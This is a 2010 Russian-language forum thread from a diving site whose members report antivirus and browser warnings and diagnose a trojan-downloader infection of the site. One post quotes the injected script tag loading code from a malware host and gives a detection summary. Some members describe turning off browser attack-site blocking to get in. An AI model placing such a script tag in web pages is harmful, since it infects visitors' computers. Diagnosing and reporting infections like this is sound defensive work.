Админы, Троян на сайте!
Модераторы: трофи, DukeSS, KWAK, Grower
Видимо, это днём было, т.к. я не видел. Если хотите уменьшить вероятность неприятных последствий, то не логиньтесь в windows под администратором. Если по каким-то причинам не хотите этого делать, то просто уменьшите права программы-браузера (IE, например, или любого другого браузера, каким пользуетесь) которая заходит на сайты. Это будет то же самое, т.е. без разницы, что только одну программу, могущую принести вред, ограничите в привилегиях, что сразу все, в том числе и те, которые вреда принести не могут. В первом случае используйте limited user account, во втором -- Drop my rights хотя бы только для браузера или и для всех других программ, могущих выходить в Интернет. По google найдёте.
Выпил -- пристегнись ремнём безопасности.
- v_Alexey
- Активный участник
- Сообщения: 3929
- Зарегистрирован: 06-07-2004 20:06
- Откуда: Волгоград, Москва
- Контактная информация:
спасибо, мой компьютеры неплохо защищены.
но вот при попытке зайти на tetis.ru
вижу такую вещь
28.06.2010 17:36:15 Обнаружено: HEUR:Trojan.Script.Generic http://nt02.co.in/3
но вот при попытке зайти на tetis.ru
вижу такую вещь
28.06.2010 17:36:15 Обнаружено: HEUR:Trojan.Script.Generic http://nt02.co.in/3
C уважением, Alexey
На тетисе, опять же, не видел, но скрипт в Вашей ссылке (видимо, Вы скопировали его со страницы тетиса) интерпретируется Майкрософтом действитвительно как загрузчик трояна:v_Alexey писал(а):28.06.2010 17:36:15 Обнаружено: HEUR:Trojan.Script.Generic nt02.co.in/3
Код: Выделить всё
TrojanDownloader:JS/Qakbot.D (?)
Encyclopedia entry
Published: Jun 11, 2010
Aliases
Not available
Alert Level (?)
Severe
Antimalware protection details
Microsoft recommends that you download the latest definitions to get protected.
Detection last updated:
Definition: 1.85.739.0
Released: Jun 24, 2010 Detection initially created:
Definition: 1.83.1561.0
Released: Jun 11, 2010
--------------------------------------------------------------------------------
Summary
This threat is classified as a Trojan - Downloader. A downloader trojan accesses remote websites in an attempt to download and install malicious or potentially unwanted software. Some downloader trojans target specific files on remote websites while others may target a specific URL that points to a website containing exploit code that may allow the site to automatically download and software or malicious code on vulnerable systems. This threat is detected by the Microsoft antivirus engine. Technical details are not currently available.
P.S. А про LUA (limited user account) я написал просто для того, что это дополнительное уменьшение вероятности проблем, в дополнение к уже имеющейся защите. Просто по историческим причинам, не техническому/программистскому, а идеологическому недосмотру MS большинство современных пользователей win по какой-то странной причине, вопреки рекомендациям MS логинится под администратором, тем самым, беспричинно увеличивая вероятность появления проблем.
Выпил -- пристегнись ремнём безопасности.
- ShurikK
- Активный участник
- Сообщения: 11482
- Зарегистрирован: 21-08-2009 13:29
- Откуда: Подольск. Александр Куликов. У меня IANTD, TDI и SDI. PADI, Господи прости! Вот хочу SNSI
- Контактная информация:
При переходе по этой ссылке каспер ругается на троян. Ссылка о подводной археологии.
http://www.tetis.ru/?p=archeolog&id=393
http://www.tetis.ru/?p=archeolog&id=393
Моя спарка развалилась. Танки на бока скатились
Так теперь вот и висят. Мне ж нырять не разрешат
Так теперь вот и висят. Мне ж нырять не разрешат
Ваш Касперский сработал правильно, т.к. обнаружил следующую строчку в тексте цитируемой Вами страницы, содержащей ссылку на загрузчик вируса Кашпировского:
Это где-то 40-ая строчка по тексту снизу страницы.
Далее возникает вопрос, а откуда вообще такая строчка на этой странице взялась? Возможны 3 варианта, в порядке убывания правдоподобности:
1) Тетис ставит ссылки на разные уважаемые ресурсы, как то Яндекс, Рамблер, ЛайфИнтернет какой-то и т.п. и выдаёт посетителям то, что подставят в данный момент эти ресурсы, без всякого контроля со своей стороны. В частности, поставил ссылку на Индийскую страницу nt02.co.in, а про дайвинг там написано или троян загружается -- это без разницы.
2) Тетис ничего подобного не делает, а всё это за Тетис делает хостер Тетиса.
3) Ни Тетис, ни хостер Тетиса ничего подобного не делают. Ваш компьютер уже заражен вирусом и при посещении страниц Ваш зараженный браузер сам подставляет ссылки для скачивания новых троянов, якобы они пришли от Тетиса.
Код: Выделить всё
<script src='http://nt02.co.in/3'></script>
Далее возникает вопрос, а откуда вообще такая строчка на этой странице взялась? Возможны 3 варианта, в порядке убывания правдоподобности:
1) Тетис ставит ссылки на разные уважаемые ресурсы, как то Яндекс, Рамблер, ЛайфИнтернет какой-то и т.п. и выдаёт посетителям то, что подставят в данный момент эти ресурсы, без всякого контроля со своей стороны. В частности, поставил ссылку на Индийскую страницу nt02.co.in, а про дайвинг там написано или троян загружается -- это без разницы.
2) Тетис ничего подобного не делает, а всё это за Тетис делает хостер Тетиса.
3) Ни Тетис, ни хостер Тетиса ничего подобного не делают. Ваш компьютер уже заражен вирусом и при посещении страниц Ваш зараженный браузер сам подставляет ссылки для скачивания новых троянов, якобы они пришли от Тетиса.
Выпил -- пристегнись ремнём безопасности.
вот что лиса стала выдавать:
Имеется информация о том, что сайт forum.tetis.ru используется для атак на компьютеры пользователей.
Имеется информация о том, что сайт forum.tetis.ru используется для атак на компьютеры пользователей.
Эдвансед Кибер Соло Техно Дайвер (HH eCCR Tmx)
+1PraNkiSh писал(а):вот что лиса стала выдавать:
Имеется информация о том, что сайт forum.tetis.ru используется для атак на компьютеры пользователей.
и гугл хром тоже ругается
Такая же беда. Устаешь кликать "игнорировать ".Пушистик писал(а):+1PraNkiSh писал(а):вот что лиса стала выдавать:
Имеется информация о том, что сайт forum.tetis.ru используется для атак на компьютеры пользователей.
и гугл хром тоже ругается
И самое удивительное, последние пол года не меньше, я мог зайти на тетис через "эксплоуер" только с использованием анонимайзера.
Только что попробовал - нет проблем. Все чудесатее и чудесатее ...
Я обычный пользователь, информация для специалистов.
Только что попробовал - нет проблем. Все чудесатее и чудесатее ...
Я обычный пользователь, информация для специалистов.
И у меня два часа как ругается, с утра проблем не было.
...отличить одно от другого
Это кто-то вкатал его в соответствующие списки...
К наличию или отсутствию троянов в конкретный момент это может не иметь отношения.
К наличию или отсутствию троянов в конкретный момент это может не иметь отношения.
И что теперь делать? - все время "игнорировать" жать?
...отличить одно от другого
- ShurikK
- Активный участник
- Сообщения: 11482
- Зарегистрирован: 21-08-2009 13:29
- Откуда: Подольск. Александр Куликов. У меня IANTD, TDI и SDI. PADI, Господи прости! Вот хочу SNSI
- Контактная информация:
Чтобы что-то написать, нужно всё игнорировать.
Это знак не флудить!
Отключил себе в лисе, в "защите", блокирование атакующих сайтов, ибо достало. Однако, плохо это. Администрация сайта ау!
Это знак не флудить!
Отключил себе в лисе, в "защите", блокирование атакующих сайтов, ибо достало. Однако, плохо это. Администрация сайта ау!
Моя спарка развалилась. Танки на бока скатились
Так теперь вот и висят. Мне ж нырять не разрешат
Так теперь вот и висят. Мне ж нырять не разрешат
Я уже писал, переключился на Эксплоуер. Это только первые пол года я как дурак анонимайзер использовал, чтобы на тетис зайти.daw писал(а):И что теперь делать? - все время "игнорировать" жать?
Потом совершенно случайно зашел через Лису и с удивлением обнаружил, что можно на прямую. Поэтому , когда сегодня Лиса дала дуба, с малой толикой надежды зашел по старому. Работает. С чем это связано не знаю. Раньше грешил на администрацию форума, потом думал, что местные военные умничают( из любого другого города Китая кроме Санья выход на Тетис через Эксплоуер был доступен),
теперь новый глюк. Однако он отменил старый. Используя прежний опыт прямой выход на форум решил за 30 минут. (29 минут нажимал игнорировать )) В очередной раз убеждаюсь, что проблемы с выходом в форум ( создаваемые неизвестными для меня воятелями с неизвестными для меня целями) решаемы. Ну а кто это делает и зачем не моего ума дело. Пока есть возможность решить вопрос не прикладывая особых усилий
- vkasper
- Активный участник
- Сообщения: 2128
- Зарегистрирован: 29-10-2009 10:10
- Откуда: МосКВА
- Контактная информация:
Опера и Мозила загружать отказываются...странно, но трабл только с сегодняшнего вечера.
Приходиться на сайт входить через IE, что не безопасно для ноута.
Плиз, решите проблемс. Подчистите коды.
Приходиться на сайт входить через IE, что не безопасно для ноута.
Плиз, решите проблемс. Подчистите коды.
Лучше быть в шоке от услышанного, чем в ж@пе от происходящего...©
Как бы было все так просто, да я "Кваку" когда еще жаловался что меня на Тетис не пускают без анонимайзера через Эксплоуер. Модераторы и админы похоже не виноваты.ShurikK писал(а):Чтобы что-то написать, нужно всё игнорировать.
Это знак не флудить!
Отключил себе в лисе, в "защите", блокирование атакующих сайтов, ибо достало. Однако, плохо это. Администрация сайта ау!
Еще раз, уважаемые компьютерные специалисты если такие имеются,
если возможно объясните без ваших этих умных цифр и выкладок, кому морду бить. Разумеется в интеллегентном смысле этого слова до пределов, которые понимает любой мыслящий человек , без применения к нему физического воздействия.
Анонимайзер... Лиса...
лучше б сразу для блондинок написали - Мозилла ругается, Эксплорер нет. И впрямь.
лучше б сразу для блондинок написали - Мозилла ругается, Эксплорер нет. И впрямь.
...отличить одно от другого